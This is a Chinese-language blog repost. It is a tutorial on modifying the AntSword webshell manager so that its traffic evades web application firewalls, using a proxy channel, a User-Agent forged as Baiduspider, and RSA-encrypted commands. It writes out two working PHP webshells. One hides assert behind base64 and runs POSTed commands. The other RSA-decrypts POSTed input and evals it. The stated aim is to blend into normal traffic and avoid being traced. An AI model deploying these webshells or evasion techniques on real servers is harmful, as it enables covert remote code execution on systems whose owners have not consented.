蚁剑特征性信息修改简单过WAF

最新推荐文章于 2025-05-29 18:41:46 发布
转载 最新推荐文章于 2025-05-29 18:41:46 发布 · 245 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://www.adminxe.com/1563.html
文章标签:

#web安全 #渗透测试 #网络安全 

零基础学黑客,搜索公众号:白帽子左一

转自:Adminxe’s Blog

原文地址:https://www.adminxe.com/1563.html

前言

针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。

关联阅读:常见的WebShell管理工具(下载安装及使用)

修改位置

蚁剑代理通道

UA特征伪造

RSA流量加密

具体操作

1.蚁剑代理通道
蚁剑代理通道设置(前提是必须有这个代理):
图片

2.UA特征伪造

蚁剑默认UA抓包:

图片

主要修改的位置:

/modules/request.js
这边主要是推荐百度UA,具体自己可以百度下其他UA,都可以根据需要来进行设置:

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
原来的UA:

图片

UA修改后(百度UA爬虫):

图片

/modules/update.js
同样的方法,将UA头修改为百度爬虫:

修改前:

图片

修改后UA头:

图片

通过以上修改后,抓包查看:

图片

3.RSA流量加密

蚁剑从2.1开始支持了RSA加密算法,但是仅仅支持php。

在我们隐藏流量中无非就是采用对称密钥加密和非对称密钥加密。

<?php $k=base64_decode('YXNzZXJ0'); $k($_POST['cmd']); ?>

注意这里YXNzZxJ0 base64解密为assert,eval不可以。因为eval属于语言构造器,在php中不能来回调,类似call_user_function()。

其中数据请求包中存在eval关键字,还是容易被waf检测到,所以UA头一定要记得修改。

采用RSA加密

新建一个rsa编码器

图片

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCjQSEjYvGaB7q7G5bjKs2b+v34
XZ5/XhHDScxpv88C+fDv6IwxErr0kwcOp+an21tTtRF7Wl4MbEksL6wE3PNPt39k
8i4PBfg51IjBYOmer8AHqr9qyDZq5XgK65yOCWsOIN8+fuP7DtvRxfTFoBNK6O3N
eAKyYF0SRzIqPz8CvwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
eval($cmd);

图片

总结

细节绝对成败,针对于WAF和内网流量设备的检测,使用加密流量去混淆在正常流量中,使用代理模式,防止间接性溯源。

在这里插入图片描述
在这里插入图片描述

zkzq
关注
网安工具系列:我不允许还有人没下载使用中国修改特征冲它
weixin_54626591的博客
03-14 1062
我不允许还有人没下载使用中国修改特征冲它
webshell动态加密连接分析与实践
悦分享
08-05 2615
antSword的自定义编码器,打开的系统设置就可以看到编码管理选项,这里选择新增一个编码器。点击新增编码器,命名之后点击编辑,可以通过代码和注释看出编码器的作用,这些代码主要就是javascript node.js基础语法。然后我们修改一下代码,随机字符串+传输数据base64 这样的结果是干扰一些waf进行模糊解码,这样是不可能被直接解密。/*** php::base64编码器*//** @param {String} pwd 连接密码。...
修改特征性信息
qq_59468567的博客
04-07 1523
自带的编码器和解码器具有明显的特点,可以通过更改配置文件来达到流量加密的目的1。例如,支持多种编码方式,如base64、chr、rot13等,这些编码方式虽然可以对数据进行加密,但在数据包中仍然存在一定的特征。
【HW系列】—C2远控服务器(webshell链接工具, metasploit、cobaltstrike)的漏洞特征流量特征
最新发布
2402_84408069的博客
05-29 1396
本文分析了常见渗透工具、冰蝎、哥斯拉以及Metasploit、CobaltStrike的流量特征。流量包含PHP代码片段和特殊参数名,冰蝎采用动态密钥协商和固定Content-Type标识,哥斯拉则带有异常Cookie特征。Metasploit分阶段下载Payload并通过异常端口交互,CobaltStrike具有checksum8路径规则和DNS异常查询特征。检测建议包括监控异常流量模式、分析进程日志,防御策略推荐框架加固和网络防护。本文仅作技术研究,禁止非法使用。
流量特征分析——、菜刀、冰蝎、哥斯拉
Sgirll的博客
07-22 1万+
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。本文将重点研究菜刀、和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。
菜刀、冰蝎、、哥斯拉的流量特征
热门推荐
eternitymd的博客
04-29 2万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
流量分析——一、流量特征
钟言的博客
06-05 5233
本篇为流量分析——1、webshell特征流量分析,详细内容包含了:Webshell特征流量分析 环境介绍 使用Wireshark进行流量分析、 1、环境说明 2、HTTP追踪流分析 3、请求体中代码块解读四、使用BurpSurite进行流量分析 1、环境配置 2、抓包分析 六、总结等内容
哥斯拉木马和连接可以吗
04-01
哥斯拉生成的WebShell包含复杂的加密/解密代码,而默认支持较简单WebShell结构(如`@eval($_POST['cmd'])`)。 --- #### 3. **可能的变通方法** - **手动适配WebShell**: 通过修改哥斯拉WebShell的解密...
图片木马如何使用
03-18
另外,引用[2]提到比菜刀更稳定,可以强调的优势,比如支持加密流量,绕过WAF等。 最后,生成相关问题,帮助用户进一步学习,比如如何检测图片木马、防范方法、其他工具比较等。确保回答结构清晰,分步骤...
初始化文件解析失败怎么解决
05-10
### 初始化文件解析失败的原因分析 是一款常用的 WebShell 管理工具,在实际使用过程中,可能会遇到初始化文件解析失败的情况。这种问题通常由以下几个原因引起: 1. **编码问题**:如果服务器端和客户端...
中国一句话木马连接为空
04-03
如果发现标准格式写法总是触发告警拦截的话,则有必要研究一下具体规则定义然后针对性修改我们的构造样式使之看起来更加无害自然一些。 举个例子说吧,原本打算发送这样的post body过去:`('whoami');?>`, 结果老是...
x1DecoderPlus:AntSword()全参数流量XOR和Base64加伪装WebShell
05-13
介绍 AntSword()全参数流量XOR+Base64,基于基础上进行改造,主要用来逃避一些流量检测。 使用 php、jsp、asp文件夹中会有单独的README文件,打开后可以看到具体的使用说明。 或者可以直接在github上点击进去也可以看到 版本 v2.1.10 更新 2021年4月27日 增加Asp支持(基础功能没问题,不排除会有Bug,欢迎提交issue。) 2021年2月28日 增加Jsp支持 2021年2月23日 增加WebShell伪装,增大XOR-Key值,加多一层Base64编码传输。
玄机-第六章 流量特征分析-流量分析
sucker的博客
02-27 1295
1,已知攻击者使用的webshell的工具是,那么攻击者应该预先向服务器上传了木马文件,而且一句话木马上传成功了,那么就可以定位到响应码200的流量。4,问黑客传入什么文件进入服务器,思路很简单:上传文件使用的一般是POST请求,在web服务器文件上传通常使用HTTP的POST方法。"1" : "0");2,问攻击者执行的第一个命令是什么,那么我们就需要查看服务端(已经被攻击者使用控制)执行了哪些命令,依然是过滤响应码200的。
我不允许还有人没下载使用中国修改特征冲它
03-06 1万+
安装使用,并修改特征
[玄机]流量特征分析-流量分析
网安日记本的博客
07-31 1万+
流量特征分析-流量分析题目做法及思路解析(个人分享)
第六章 流量特征分析-流量分析(玄机靶场系列)
m0_73062138的博客
05-05 594
text/html。
、冰蝎、哥斯拉流量特征
THZLYXX的博客
11-18 602
2.流量包开头123(链接密码)=@ini_set("display_errors","0")1.流量包中包含大量的content-type:application。2.3.0冰蝎内置16个user-agent。1.POST请求中的参数默认密码为pass。3.参数打多以0X...= 这种形式开头。
第六章 流量特征分析-流量分析
2401_84830066的博客
01-09 489
前提-的流量特征: 1. 默认的USER-agent请求头 是 antsword xxx,可以通过修改:/modules/request.js 文件中 请求UA绕过 2. 每个请求体都存在@ini_set(“display_errors”, “0”);@set_time_limit(0)开头。并且后面存在base64等字符 3. 混淆加密后还有一个比较明显的特征,即为参数名大多以“_0x......=”这种形式(下划线可替换),所以以_0x开头的参数名也很可能就是恶意流量 4. 默认的
玄机平台流量特征分析-流量分析
2301_76227305的博客
06-20 991
最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
WAF绕过技术:冷门函数与策略规避详解
本文主要介绍了在信息安全领域,特别是针对Web应用程序防火墙(WAF)的绕过技术。这些技术涉及到数据库查询注入、编码转换、特殊语法利用和冷门函数的应用,目的是为了规避WAF的检测,实现攻击或漏洞利用。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值